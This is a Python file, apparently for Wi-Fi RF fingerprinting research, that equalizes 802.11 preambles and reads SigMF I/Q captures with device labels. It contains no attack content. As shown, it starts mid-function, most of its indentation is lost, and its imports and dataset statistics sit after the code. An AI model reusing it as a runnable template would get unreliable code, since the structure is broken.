# # ----------------------------------------------------
# # Preamble equalization
# # ----------------------------------------------------
# ind_guard = np.concatenate((np.arange(-32, -26), np.arange(27, 32))) + (N//2)
# ind_null = np.concatenate((np.array([0]), np.arange(-(N//2), -32), np.arange(32, (N//2)) )) + (N//2)
# ind_pilots = np.array([-21, -7, 7, 21]) + (N//2)
# mask_data = np.ones(N)
# mask_data_pilots = np.ones(N)
# mask_data[list(np.concatenate((ind_guard, ind_null, ind_pilots)))] = 0
# mask_data_pilots[list(np.concatenate((ind_guard, ind_null)))] = 0
# ind_all_all = np.arange(-(N//2), (N//2)) + N//2
# ind_data = ind_all_all[mask_data==1]
# ind_data_pilots = ind_all_all[mask_data_pilots==1]
# h_hat = ifft(ifftshift(H_hat))
# Stf_1_eq = fftshift(fft(preamble[n_short-2*N:n_short-N]))
# Stf_2_eq = fftshift(fft(preamble[n_short-N:n_short]))
# Ltf_1_eq = fftshift(fft(preamble[n_short+n_long-2*N:n_short+n_long-N]))
# Ltf_2_eq = fftshift(fft(preamble[n_short+n_long-N:n_short+n_long]))
# Stf_1_eq[ind_data_pilots] /= (H_hat[ind_data_pilots]+0.001)
# Stf_2_eq[ind_data_pilots] /= (H_hat[ind_data_pilots]+0.001)
# Ltf_1_eq[ind_data_pilots] /= (H_hat[ind_data_pilots]+0.001)
# Ltf_2_eq[ind_data_pilots] /= (H_hat[ind_data_pilots]+0.001)
# Stf_1_eq[ind_guard] = 0
# Stf_2_eq[ind_guard] = 0
# Ltf_1_eq[ind_guard] = 0
# Ltf_2_eq[ind_guard] = 0
# Stf_1_eq[ind_null] = 0
# Stf_2_eq[ind_null] = 0
# Ltf_1_eq[ind_null] = 0
# Ltf_2_eq[ind_null] = 0
# # Sanity check
# Ltf_1_eq = Ltf
# Ltf_2_eq = Ltf
# Stf_1_eq = Stf_64
# Stf_2_eq = Stf_64
# stf_1_eq = ifft(ifftshift(Stf_1_eq))
# stf_2_eq = ifft(ifftshift(Stf_2_eq))
# ltf_1_eq = ifft(ifftshift(Ltf_1_eq))
# ltf_2_eq = ifft(ifftshift(Ltf_2_eq))
# preamble_eq = np.concatenate((stf_1_eq[:-(N//4)], stf_1_eq, stf_2_eq[:-(N//4)], stf_2_eq, ltf_1_eq[:-(N//2)], ltf_1_eq, ltf_2_eq))
return residuals, preamble_constructed # , h_hat, H_hat
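# --- Editor's illustrative sketch (hypothetical helper, not in the original file) ---
# The residual is useful for fingerprinting because the reconstruction above
# explains the nominal channel/CFO effects, so what remains is dominated by Tx
# impairments. A simple scalar summary one might derive from it:
def _residual_energy_ratio(residuals, preamble):
    # fraction of preamble energy left unexplained by the channel+CFO model
    return np.sum(np.abs(residuals) ** 2) / np.sum(np.abs(preamble) ** 2)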
def basic_equalize_preamble(preamble_in, fs, verbose=False, label=''):
"""
Function that strips out the effect of the channel from the preamble.
It does the following:
1. LTI channel estimation (with delay spread <= length of cyclic prefix)
2. Remove the channel estimate from the preamble
Inputs:
preamble - Preamble containing effects of the channel and Tx nonlinearities
(320 samples)
### NotImplemented: freq_offset - Dict containing freq offset
Output:
preamble_eq - Preamble with the channel stripped out (320 samples)
### NotImplemented: preamble_eq_offset - Equalized preamble with frequency offset
"""
# if fs!=20e6:
# raise NotImplementedError
preamble = preamble_in.copy()
if fs == 200e6:
if preamble.size != 3200:
raise Exception('Size of preamble is {}, but it should be 3200.'.format(preamble.size))
n_short = 1600
n_long = 1600
L = 160
N = 640
# ----------------------------------------------------
# Frequency offset correction
# ----------------------------------------------------
# sig3 = preamble[np.int(n_short/2):n_short-L].conj().copy()
# sig4 = preamble[np.int(n_short/2)+L:n_short].copy()
# df1 = 1/L * np.angle(sig3.dot(sig4.T))
# preamble *= np.exp(-1j*np.arange(0, preamble.size)*df1).flatten()
# sig5 = preamble[n_short+2*L:n_short+2*L+N].conj().copy()
# sig6 = preamble[n_short+N+2*L:n_short+n_long].reshape(1,-1).copy()
# df2 = 1/N * np.angle(sig5.dot(sig6.T))
# preamble *= np.exp(-1j*np.arange(0, preamble.size)*df2).flatten()
# ------------------------------------------------------------------------
# LTI channel estimation (with delay spread <= length of cyclic prefix)
# ------------------------------------------------------------------------
Stf_64 = np.sqrt(13/6)*np.array([0, 0, 0, 0, 0, 0, 0, 0, 1+1j, 0, 0, 0, -1-1j, 0, 0, 0, 1+1j, 0, 0, 0, -1-1j, 0, 0, 0, -1-1j, 0, 0, 0,
1+1j, 0, 0, 0, 0, 0, 0, 0, -1-1j, 0, 0, 0, -1-1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 0, 0, 0, 0])
Ltf = np.array([0, 0, 0, 0, 0, 0, 1, 1, -1, -1, 1, 1, -1, 1, -1, 1, 1, 1, 1, 1, 1, -1, -1, 1, 1, -1, 1, -1, 1, 1, 1,
1, 0, 1, -1, -1, 1, 1, -1, 1, -1, 1, -1, -1, -1, -1, -1, 1, 1, -1, -1, 1, -1, 1, -1, 1, 1, 1, 1, 0, 0, 0, 0, 0])
        Ltf1_rx = fftshift(
            fft(preamble[n_short+int(n_long/5):n_short+int(n_long/5 + n_long*2/5)]))
        Ltf2_rx = fftshift(fft(preamble[n_short+int(n_long/5 + n_long*2/5):n_short+n_long]))
        Ltf_mid_rx = fftshift(
            fft(preamble[n_short + 2*L - int(L/2):n_short + 2*L+N - int(L/2)]))
Ltf_avg_rx = (Ltf1_rx + Ltf2_rx)/2
# Ltf_avg_rx = Ltf1_rx
# Ltf_avg_rx = Ltf2_rx
# Ltf_mid_rx = Ltf_avg_rx
# AA = np.zeros((N, N)) + 0j
# for m in range(N):
# for n in range(L+1):
# AA[m, n] = Ltf[m] * np.exp(-1j*2*np.pi*m*n/N)
# A = AA[:, :L+1] * np.exp(1j*np.pi*np.arange(L+1)).reshape(1, -1)
# ind_all = np.arange(-32, 32) + 32
# ind_guard = np.concatenate((np.arange(-32, -26), np.arange(27, 32))) + 32
# ind_null = np.array([0]) + 32
# mask_data_pilots = np.ones(64)
# mask_data_pilots[list(np.concatenate((ind_guard, ind_null)))] = 0
# ind_data_pilots = ind_all[mask_data_pilots==1]
# h_hat_small, residuals, rank, singular_values = np.linalg.lstsq(A[ind_data_pilots,:], Ltf_mid_rx[ind_data_pilots], rcond=None)
# h_hat = np.zeros(N)+0j
# h_hat[:L+1] = h_hat_small
# # h_hat = np.roll(h_hat, -np.int(L/2))
# H_hat = fftshift(fft(h_hat))
ind_all = np.arange(-32, 32) + (N//2)
H_hat = np.zeros((N)) + 1j*np.zeros((N))
# ipdb.set_trace()
H_hat[ind_all] = Ltf_avg_rx[ind_all]*Ltf
# H_hat[ind_all] = Ltf/Ltf_avg_rx[ind_all]
if verbose is True:
freq = np.arange(-32, 32)
# H_hat_coarse = Ltf_mid_rx*Ltf
H_hat_coarse = H_hat[ind_all]
h_hat_coarse = ifft(ifftshift(H_hat_coarse))
plt.figure(figsize=[10, 3])
plt.subplot(1, 2, 1)
plt.stem(freq, np.abs(H_hat_coarse))
plt.grid(True)
plt.title('Magnitude')
plt.xlabel('Frequency bin')
plt.subplot(1, 2, 2)
# plt.stem(freq, np.unwrap(np.angle(H_hat)))
plt.stem(freq, np.angle(H_hat_coarse))
plt.title('Phase')
plt.xlabel('Frequency bin')
plt.suptitle('Coarse estimation'+label)
plt.grid(True)
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.93])
plt.figure(figsize=[10, 3])
plt.subplot(1, 2, 1)
plt.stem(np.abs(h_hat_coarse))
plt.title('Magnitude')
plt.xlabel('Time (in samples)')
plt.grid(True)
plt.subplot(1, 2, 2)
# plt.stem(np.unwrap(np.angle(h_hat)))
plt.stem(np.angle(h_hat_coarse))
plt.title('Phase')
plt.xlabel('Time (in samples)')
plt.grid(True)
plt.suptitle('Coarse estimation'+label)
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.93])
# plt.figure(figsize=[10, 3])
# plt.subplot(1,2,1)
# plt.stem(freq, np.abs(H_hat))
# plt.grid(True)
# plt.title('Magnitude')
# plt.xlabel('Frequency bin')
# plt.subplot(1,2,2)
# # plt.stem(freq, np.unwrap(np.angle(H_hat)))
# plt.stem(freq, np.angle(H_hat))
# plt.title('Phase')
# plt.xlabel('Frequency bin')
# plt.suptitle('Frequency domain least squares estimation')
# plt.grid(True)
# plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.9])
# plt.figure(figsize=[10, 3])
# plt.subplot(1,2,1)
# plt.stem(np.abs(h_hat))
# plt.title('Magnitude')
# plt.xlabel('Time (in samples)')
# plt.grid(True)
# plt.subplot(1,2,2)
# # plt.stem(np.unwrap(np.angle(h_hat)))
# plt.stem(np.angle(h_hat))
# plt.title('Phase')
# plt.xlabel('Time (in samples)')
# plt.grid(True)
# plt.suptitle('Frequency domain least squares estimation')
# plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.9])
plt.show()
# ----------------------------------------------------
# Preamble equalization
# ----------------------------------------------------
ind_guard = np.concatenate((np.arange(-32, -26), np.arange(27, 32))) + (N//2)
ind_null = np.concatenate(
(np.array([0]), np.arange(-(N//2), -32), np.arange(32, (N//2)))) + (N//2)
ind_pilots = np.array([-21, -7, 7, 21]) + (N//2)
mask_data = np.ones(N)
mask_data_pilots = np.ones(N)
mask_data[list(np.concatenate((ind_guard, ind_null, ind_pilots)))] = 0
mask_data_pilots[list(np.concatenate((ind_guard, ind_null)))] = 0
ind_all_all = np.arange(-(N//2), (N//2)) + N//2
ind_data = ind_all_all[mask_data == 1]
ind_data_pilots = ind_all_all[mask_data_pilots == 1]
Stf_1_eq = fftshift(fft(preamble[n_short-2*N:n_short-N]))
Stf_2_eq = fftshift(fft(preamble[n_short-N:n_short]))
Ltf_1_eq = fftshift(fft(preamble[n_short+n_long-2*N:n_short+n_long-N]))
Ltf_2_eq = fftshift(fft(preamble[n_short+n_long-N:n_short+n_long]))
Stf_1_eq[ind_data_pilots] /= (H_hat[ind_data_pilots]+0.001)
Stf_2_eq[ind_data_pilots] /= (H_hat[ind_data_pilots]+0.001)
Ltf_1_eq[ind_data_pilots] /= (H_hat[ind_data_pilots]+0.001)
Ltf_2_eq[ind_data_pilots] /= (H_hat[ind_data_pilots]+0.001)
Stf_1_eq[ind_guard] = 0
Stf_2_eq[ind_guard] = 0
Ltf_1_eq[ind_guard] = 0
Ltf_2_eq[ind_guard] = 0
Stf_1_eq[ind_null] = 0
Stf_2_eq[ind_null] = 0
Ltf_1_eq[ind_null] = 0
Ltf_2_eq[ind_null] = 0
# # Sanity check
# Ltf_1_eq = Ltf
# Ltf_2_eq = Ltf
# Stf_1_eq = Stf_64
# Stf_2_eq = Stf_64
if verbose is True:
Stf_1_eq_down = Stf_1_eq[ind_all]
Stf_2_eq_down = Stf_2_eq[ind_all]
Ltf_1_eq_down = Ltf_1_eq[ind_all]
Ltf_2_eq_down = Ltf_2_eq[ind_all]
plt.figure(figsize=[13, 4.8])
plt.subplot(1, 3, 1)
plt.scatter(Stf_1_eq_down.real, Stf_1_eq_down.imag)
plt.title('Equalized STF - 1')
plt.subplot(1, 3, 2)
plt.scatter(Stf_2_eq_down.real, Stf_2_eq_down.imag)
plt.title('Equalized STF - 2')
plt.subplot(1, 3, 3)
plt.scatter(Stf_64.real, Stf_64.imag)
plt.title('Actual STF')
plt.suptitle('Signal constellations')
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.93])
plt.figure(figsize=[13, 4.8])
plt.subplot(1, 3, 1)
plt.scatter(Ltf_1_eq_down.real, Ltf_1_eq_down.imag)
plt.title('Equalized LTF - 1')
plt.subplot(1, 3, 2)
plt.scatter(Ltf_2_eq_down.real, Ltf_2_eq_down.imag)
plt.title('Equalized LTF - 2')
plt.subplot(1, 3, 3)
plt.scatter(Ltf.real, Ltf.imag)
plt.title('Actual LTF')
plt.suptitle('Signal constellations')
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.93])
plt.show()
# ipdb.set_trace()
stf_1_eq = ifft(ifftshift(Stf_1_eq))
stf_2_eq = ifft(ifftshift(Stf_2_eq))
ltf_1_eq = ifft(ifftshift(Ltf_1_eq))
ltf_2_eq = ifft(ifftshift(Ltf_2_eq))
# preamble_eq = np.concatenate((stf_1_eq[:-(N//2)], stf_1_eq, stf_2_eq, ltf_1_eq[:-(N//2)], ltf_1_eq, ltf_2_eq))
preamble_eq = np.concatenate(
(stf_1_eq[-(N//4):], stf_1_eq, stf_2_eq[-(N//4):], stf_2_eq, ltf_1_eq[-(N//2):], ltf_1_eq, ltf_2_eq))
# import pdb
# pdb.set_trace()
# shift = freq_offset['shift_coarse']
# df1 = freq_offset['carrier_coarse']
# df2 = freq_offset['carrier_fine']
# preamble_eq_offset = preamble_eq.copy()
# Add in coarse carrier freq offset, taking the shift into account
# if shift>=0:
# preamble_eq_offset[shift:] = preamble_eq[shift:] * np.exp(1j*np.arange(0,preamble_eq.size - shift)*df1).flatten()
# else:
# preamble_eq_offset= preamble_eq * np.exp(1j*(np.arange(0, preamble_eq.size)+shift)*df1).flatten()
# # Add in fine carrier freq offset
# preamble_eq_offset *= np.exp(1j*np.arange(0, preamble_eq.size)*df2).flatten()
# return preamble_eq, preamble_eq_offset
elif fs == 20e6:
if preamble.size != 320:
raise Exception('Size of preamble is {}, but it should be 320.'.format(preamble.size))
n_short = 160
n_long = 160
# ----------------------------------------------------
# Frequency offset correction
# ----------------------------------------------------
# sig3 = preamble[np.int(n_short/2):n_short-16].conj().copy()
# sig4 = preamble[np.int(n_short/2)+16:n_short].copy()
# df1 = 1/16 * np.angle(sig3.dot(sig4.T))
# preamble *= np.exp(-1j*np.arange(0, preamble.size)*df1).flatten()
# sig5 = preamble[n_short+32:n_short+32+64].conj().copy()
# sig6 = preamble[n_short+64+32:n_short+n_long].reshape(1,-1).copy()
# df2 = 1/64 * np.angle(sig5.dot(sig6.T))
# preamble *= np.exp(-1j*np.arange(0, preamble.size)*df2).flatten()
# ------------------------------------------------------------------------
# LTI channel estimation (with delay spread <= length of cyclic prefix)
# ------------------------------------------------------------------------
Stf_64 = np.sqrt(13/6)*np.array([0, 0, 0, 0, 0, 0, 0, 0, 1+1j, 0, 0, 0, -1-1j, 0, 0, 0, 1+1j, 0, 0, 0, -1-1j, 0, 0, 0, -1-1j, 0, 0, 0,
1+1j, 0, 0, 0, 0, 0, 0, 0, -1-1j, 0, 0, 0, -1-1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 0, 0, 0, 0])
Ltf = np.array([0, 0, 0, 0, 0, 0, 1, 1, -1, -1, 1, 1, -1, 1, -1, 1, 1, 1, 1, 1, 1, -1, -1, 1, 1, -1, 1, -1, 1, 1, 1,
1, 0, 1, -1, -1, 1, 1, -1, 1, -1, 1, -1, -1, -1, -1, -1, 1, 1, -1, -1, 1, -1, 1, -1, 1, 1, 1, 1, 0, 0, 0, 0, 0])
L = 16
N = 64
Ltf1_rx = fftshift(
fft(preamble[n_short+np.int(n_long/5):n_short+np.int(n_long/5 + n_long*2/5)]))
Ltf2_rx = fftshift(fft(preamble[n_short+np.int(n_long/5 + n_long*2/5):n_short+n_long]))
Ltf_mid_rx = fftshift(
fft(preamble[n_short + 2*L - np.int(L/2):n_short + 2*L+N - np.int(L/2)]))
Ltf_avg_rx = (Ltf1_rx + Ltf2_rx)/2
# Ltf_mid_rx = Ltf_avg_rx
AA = np.zeros((N, N)) + 0j
for m in range(N):
for n in range(L+1):
AA[m, n] = Ltf[m] * np.exp(-1j*2*np.pi*m*n/N)
A = AA[:, :L+1] * np.exp(1j*np.pi*np.arange(L+1)).reshape(1, -1)
ind_all = np.arange(-32, 32) + 32
ind_guard = np.concatenate((np.arange(-32, -26), np.arange(27, 32))) + 32
ind_null = np.array([0]) + 32
mask_data_pilots = np.ones(64)
mask_data_pilots[list(np.concatenate((ind_guard, ind_null)))] = 0
ind_data_pilots = ind_all[mask_data_pilots == 1]
h_hat_small, residuals, rank, singular_values = np.linalg.lstsq(
A[ind_data_pilots, :], Ltf_mid_rx[ind_data_pilots], rcond=None)
h_hat = np.zeros(N)+0j
h_hat[:L+1] = h_hat_small
# h_hat = np.roll(h_hat, -np.int(L/2))
H_hat = fftshift(fft(h_hat))
H_hat = Ltf_avg_rx*Ltf
if verbose is True:
freq = np.arange(-32, 32)
H_hat_coarse = Ltf_mid_rx*Ltf
h_hat_coarse = ifft(ifftshift(H_hat_coarse))
plt.figure(figsize=[10, 3])
plt.subplot(1, 2, 1)
plt.stem(freq, np.abs(H_hat_coarse))
plt.grid(True)
plt.title('Magnitude')
plt.xlabel('Frequency bin')
plt.subplot(1, 2, 2)
# plt.stem(freq, np.unwrap(np.angle(H_hat)))
plt.stem(freq, np.angle(H_hat_coarse))
plt.title('Phase')
plt.xlabel('Frequency bin')
plt.suptitle('Coarse estimation')
plt.grid(True)
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.93])
plt.figure(figsize=[10, 3])
plt.subplot(1, 2, 1)
plt.stem(np.abs(h_hat_coarse))
plt.title('Magnitude')
plt.xlabel('Time (in samples)')
plt.grid(True)
plt.subplot(1, 2, 2)
# plt.stem(np.unwrap(np.angle(h_hat)))
plt.stem(np.angle(h_hat_coarse))
plt.title('Phase')
plt.xlabel('Time (in samples)')
plt.grid(True)
plt.suptitle('Coarse estimation')
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.93])
plt.figure(figsize=[10, 3])
plt.subplot(1, 2, 1)
plt.stem(freq, np.abs(H_hat))
plt.grid(True)
plt.title('Magnitude')
plt.xlabel('Frequency bin')
plt.subplot(1, 2, 2)
# plt.stem(freq, np.unwrap(np.angle(H_hat)))
plt.stem(freq, np.angle(H_hat))
plt.title('Phase')
plt.xlabel('Frequency bin')
plt.suptitle('Frequency domain least squares estimation')
plt.grid(True)
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.9])
plt.figure(figsize=[10, 3])
plt.subplot(1, 2, 1)
plt.stem(np.abs(h_hat))
plt.title('Magnitude')
plt.xlabel('Time (in samples)')
plt.grid(True)
plt.subplot(1, 2, 2)
# plt.stem(np.unwrap(np.angle(h_hat)))
plt.stem(np.angle(h_hat))
plt.title('Phase')
plt.xlabel('Time (in samples)')
plt.grid(True)
plt.suptitle('Frequency domain least squares estimation')
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.9])
# plt.show()
# ----------------------------------------------------
# Preamble equalization
# ----------------------------------------------------
ind_all = np.arange(-32, 32) + 32
ind_guard = np.concatenate((np.arange(-32, -26), np.arange(27, 32))) + 32
ind_null = np.array([0]) + 32
ind_pilots = np.array([-21, -7, 7, 21]) + 32
mask_data = np.ones(64)
mask_data_pilots = np.ones(64)
mask_data[list(np.concatenate((ind_guard, ind_null, ind_pilots)))] = 0
mask_data_pilots[list(np.concatenate((ind_guard, ind_null)))] = 0
ind_data = ind_all[mask_data == 1]
ind_data_pilots = ind_all[mask_data_pilots == 1]
Stf_1_eq = fftshift(fft(preamble[n_short-2*N:n_short-N]))
Stf_2_eq = fftshift(fft(preamble[n_short-N:n_short]))
Ltf_1_eq = fftshift(fft(preamble[n_short+n_long-2*N:n_short+n_long-N]))
Ltf_2_eq = fftshift(fft(preamble[n_short+n_long-N:n_short+n_long]))
Stf_1_eq[ind_data_pilots] /= H_hat[ind_data_pilots]
Stf_2_eq[ind_data_pilots] /= H_hat[ind_data_pilots]
Ltf_1_eq[ind_data_pilots] /= H_hat[ind_data_pilots]
Ltf_2_eq[ind_data_pilots] /= H_hat[ind_data_pilots]
Stf_1_eq[ind_guard] = 0
Stf_2_eq[ind_guard] = 0
Ltf_1_eq[ind_guard] = 0
Ltf_2_eq[ind_guard] = 0
Stf_1_eq[ind_null] = 0
Stf_2_eq[ind_null] = 0
Ltf_1_eq[ind_null] = 0
Ltf_2_eq[ind_null] = 0
# # Sanity check
# Ltf_1_eq = Ltf
# Ltf_2_eq = Ltf
# Stf_1_eq = Stf_64
# Stf_2_eq = Stf_64
if verbose is True:
plt.figure(figsize=[13, 4.8])
plt.subplot(1, 3, 1)
plt.scatter(Stf_1_eq.real, Stf_1_eq.imag)
plt.title('Equalized STF - 1')
plt.subplot(1, 3, 2)
plt.scatter(Stf_2_eq.real, Stf_2_eq.imag)
plt.title('Equalized STF - 2')
plt.subplot(1, 3, 3)
plt.scatter(Stf_64.real, Stf_64.imag)
plt.title('Actual STF')
plt.suptitle('Signal constellations')
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.93])
plt.figure(figsize=[13, 4.8])
plt.subplot(1, 3, 1)
plt.scatter(Ltf_1_eq.real, Ltf_1_eq.imag)
plt.title('Equalized LTF - 1')
plt.subplot(1, 3, 2)
plt.scatter(Ltf_2_eq.real, Ltf_2_eq.imag)
plt.title('Equalized LTF - 2')
plt.subplot(1, 3, 3)
plt.scatter(Ltf.real, Ltf.imag)
plt.title('Actual LTF')
plt.suptitle('Signal constellations')
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.93])
plt.show()
stf_1_eq = ifft(ifftshift(Stf_1_eq))
stf_2_eq = ifft(ifftshift(Stf_2_eq))
ltf_1_eq = ifft(ifftshift(Ltf_1_eq))
ltf_2_eq = ifft(ifftshift(Ltf_2_eq))
preamble_eq = np.concatenate(
(stf_1_eq[-32:], stf_1_eq, stf_2_eq, ltf_1_eq[-32:], ltf_1_eq, ltf_2_eq))
# shift = freq_offset['shift_coarse']
# df1 = freq_offset['carrier_coarse']
# df2 = freq_offset['carrier_fine']
# preamble_eq_offset = preamble_eq.copy()
# Add in coarse carrier freq offset, taking the shift into account
# if shift>=0:
# preamble_eq_offset[shift:] = preamble_eq[shift:] * np.exp(1j*np.arange(0,preamble_eq.size - shift)*df1).flatten()
# else:
# preamble_eq_offset= preamble_eq * np.exp(1j*(np.arange(0, preamble_eq.size)+shift)*df1).flatten()
# # Add in fine carrier freq offset
# preamble_eq_offset *= np.exp(1j*np.arange(0, preamble_eq.size)*df2).flatten()
# return preamble_eq, preamble_eq_offset
return preamble_eq
def rms(x):
# Root mean squared value
return np.sqrt(np.mean(x * np.conjugate(x)))
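# For complex x, x * conj(x) equals |x|**2 (real-valued, but complex dtype), so
# rms(x) matches np.sqrt(np.mean(np.abs(x)**2)) up to a zero imaginary part,
# e.g. rms(np.array([1+1j, 1-1j])) == sqrt(2).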
def shift_frequency(vector, freq_shift, fs):
# Shift frequency of time-series signal by specified amount
# vector: complex time-series signal
# freq_shift: frequency shift amount
# fs: sampling frequency of complex signal
t = np.arange(0, np.size(vector)) / fs # define time axis
# Sqrt(2) factor ensures that the power of the frequency downconverted signal
# is equal to the power of its passband counterpart
modulation = np.exp(-1j * 2 * np.pi * freq_shift * t) / np.sqrt(2) # frequency shift factor
return vector * modulation # baseband signal
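# Usage sketch (values hypothetical): downconvert a band of interest sitting
# 10 MHz above the capture center of a 200 MS/s recording:
#   baseband = shift_frequency(capture, freq_shift=10e6, fs=200e6)
# The 1/sqrt(2) factor keeps the downconverted power consistent with the
# passband convention noted above.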
def resample(vector, fs, dfs):
# Resample signal from original sample rate to desired sample rate
# fs: original sampling frequency
# dfs: desired sampling frequency
fs = int(round(fs)) # convert to integers
dfs = int(round(dfs))
cfs = lcm(fs, dfs) # common sampling frequency
if cfs > fs:
# Upsample from start-Hz to common-Hz
vector = resampy.resample(vector, fs, cfs, filter='kaiser_best')
# Downsample from common-Hz to desired-Hz
return resampy.resample(vector, cfs, dfs, filter='kaiser_best')
def lcm(a, b):
# Least common multiple of a and b
    return a * b // math.gcd(a, b) if a and b else 0  # exact integer arithmetic; fractions.gcd was removed in Python 3.9
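# Example: resample(vector, 200e6, 20e6) gives cfs = lcm(200000000, 20000000)
# = 200000000, so cfs == fs, the upsampling branch is skipped, and only the
# band-limited decimation from 200 MS/s to 20 MS/s runs.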
def get_sliding_window(x, window_size=10, stride=1, fs=200e6, fs_natural=20e6):
shape_ = x.shape
window_size_samples = np.int(window_size * (fs/fs_natural))
stride_samples = np.int(stride * (fs/fs_natural))
# sliding_window = [None] * ((shape_[1]-100+10)//10)
for i in tqdm(np.arange(0, shape_[1] - window_size_samples + stride_samples, stride_samples)):
if i == 0:
y = x[:, i:i + window_size_samples, :].copy()
else:
y = np.concatenate((y, x[:, i:i + window_size_samples, :]), axis=0)
return y
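# The loop above copies the output on every np.concatenate (quadratic in the
# number of windows). A rough equivalent (assumed NumPy >= 1.20, same
# window-major ordering, stride dividing the sample count evenly):
#   from numpy.lib.stride_tricks import sliding_window_view
#   v = sliding_window_view(x, window_size_samples, axis=1)[:, ::stride_samples]
#   v = v.transpose(1, 0, 3, 2)      # -> (n_win, n_sig, win_len, n_chan)
#   y = v.reshape(-1, window_size_samples, x.shape[2])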
def read_wifi(files, base_data_directory, device_map, progress=True):
'''
    Read wifi data from the data directory
'''
csv = files['csv_objects'].items()
if progress is True:
csv = tqdm(csv)
data_dict = dict(signal={}, device_key={}, # Complex signal and device label [0, N-1] from device_map
sample_rate={}, capture_sample_rate={}, capture_frequency={}, capture_hw={},
center_frequency={}, freq_lower_edge={}, freq_upper_edge={},
reference_number={}, data_file={}, sample_start={}, sample_count={},
device_type={}, device_id={}, device_manufacturer={}
)
signal_index = 0
for file, signal_list in csv:
# Example:
# file = 'adsb_gfi_3_dataset/10_sigmf_files_dataset/A-23937.sigmf-data'
# signal_list = ['A-23937-34', 'A-23937-54']
# check to see if the first character in "file" is a slash:
while file[0] == '/' or file[0] == '\\':
file = file[1:]
# if 'Windows' in platform():
# file = file.replace("/", "\\")
data_file = os.path.join(base_data_directory, file)
metadata_file = data_file.replace('sigmf-data', 'sigmf-meta')
all_signals = json.load(open(metadata_file))
capture = dict(capture_sample_rate=all_signals['global']['core:sample_rate'],
sample_rate=all_signals['global']['core:sample_rate'],
capture_hw=all_signals['global']['core:hw'],
capture_frequency=all_signals['capture'][0]['core:frequency'],
data_file=data_file)
for signal_name in signal_list:
# data_dict['reference_number'][signal_index] = signal_name
for key, value in capture.items():
data_dict[key][signal_index] = value
capture_properties = all_signals['capture']
signal_properties = get_json_signal(
all_signals['annotations'], capture_properties[0], signal_name, type='wifi')
for key, value in signal_properties.items():
data_dict[key][signal_index] = value
device_id = signal_properties['device_id']
data_dict['device_key'][signal_index] = device_map[device_id]
filename = data_dict['data_file'][signal_index]
start_sample = data_dict['sample_start'][signal_index]
sample_count = data_dict['sample_count'][signal_index]
data, buffer_start, buffer_end = read_sample(
filename, start_sample, sample_count, desired_buffer=0)
data_dict['signal'][signal_index] = data
data_dict['center_frequency'][signal_index] = data_dict['capture_frequency'][signal_index]
# ipdb.set_trace()
signal_index = signal_index + 1
return data_dict
def parse_input_files(input_csv, devices_csv):
'''
Parser for wifi dataset
'''
device_list = [] # a list of the devices to be trained/tested with
device_map = {} # a reverse map from device name to index
csv_objects = {} # a dictionary with filenames for keys, lists of signals as values
with open(devices_csv) as devices_csv_file:
devices_reader = csv.reader(devices_csv_file, delimiter=',')
for device in devices_reader:
device_list.append(device[0])
for i, device in enumerate(device_list):
device_map[device] = i
with open(input_csv) as input_csv_file:
input_reader = csv.reader(input_csv_file, delimiter=',')
for row in input_reader:
csv_objects[row[0]] = row[1:]
return {'device_list': device_list,
'device_map': device_map,
'csv_objects': csv_objects}
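# Expected CSV layouts (inferred from the parsing above):
#   devices_csv: one device name per row, e.g.  wifi_device_07
#   input_csv:   <path to .sigmf-data>,<signal id>,<signal id>,...
#                e.g.  dataset/A-23937.sigmf-data,A-23937-34,A-23937-54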
def get_json_signal(json_annotations, capture, signal_id, type=None):
'''
Get signal from json
'''
for signal in json_annotations:
if signal != {} and signal['capture_details:signal_reference_number'] == signal_id:
if 'rfml:label' in signal:
signal_label = signal['rfml:label']
if type is None:
type = signal_label[0]
else:
            signal_label = (None, None, None)  # tuple(None, None, None) would raise TypeError
if type is None:
type = "unknown"
if type == "wifi":
return {'freq_lower_edge': signal['core:freq_lower_edge'],
'freq_upper_edge': signal['core:freq_upper_edge'],
'sample_start': signal['core:sample_start'],
'sample_count': signal['core:sample_count'],
'device_type': signal_label[0],
'device_manufacturer': signal_label[1],
'device_id': signal_label[2]}
elif type == "ADS-B":
        return {'snr': signal['capture_details:SNRdB'],
'reference_number': signal['capture_details:signal_reference_number'],
'freq_lower_edge': capture['core:freq_lower_edge'],
'freq_upper_edge': capture['core:freq_upper_edge'],
'sample_start': signal['core:sample_start'],
'sample_count': signal['core:sample_count'],
'device_type': signal_label[0],
'device_id': signal_label[1]}
else:
print('Unknown signal type', type)
return None
return None
def read_sample(filename, start_sample, sample_count, desired_buffer):
'''
    Read complex samples (interleaved int16 I/Q) from a sigmf-data file, with an optional guard buffer on each side
'''
buffer_start = min(desired_buffer, start_sample)
buffer_end = desired_buffer
sample_count += (buffer_start + buffer_end)
with open(filename, "rb") as f:
# Seek to startSample
f.seek((start_sample - buffer_start) * 4) # 4bytes per sample (2x16 bit ints)
# Read in as ints
raw = np.fromfile(f, dtype='int16', count=2*sample_count)
samples_read = int(raw.size / 2)
buffer_end -= (sample_count - samples_read)
# Convert interleaved ints into two planes, real and imaginary
array = raw.reshape([samples_read, 2])
# convert the array to complex
array = array[:, 0] + 1j*array[:, 1]
return array, buffer_start, buffer_end
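# Example (hypothetical numbers): read 1000 samples starting at sample 5000
# with a 100-sample guard on each side:
#   sig, pre, post = read_sample(fname, 5000, 1000, desired_buffer=100)
#   # sig.size == pre + 1000 + post; pre/post shrink at the file boundaries
# Each complex sample occupies 4 bytes on disk (two int16 values).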
| 40.755221
| 174
| 0.55426
|
import numpy as np
import os
import json
import csv
import math
import fractions
import resampy
from tqdm import tqdm, trange
import matplotlib
import matplotlib.pyplot as plt
from scipy.fftpack import fft, ifft, fftshift, ifftshift
import ipdb
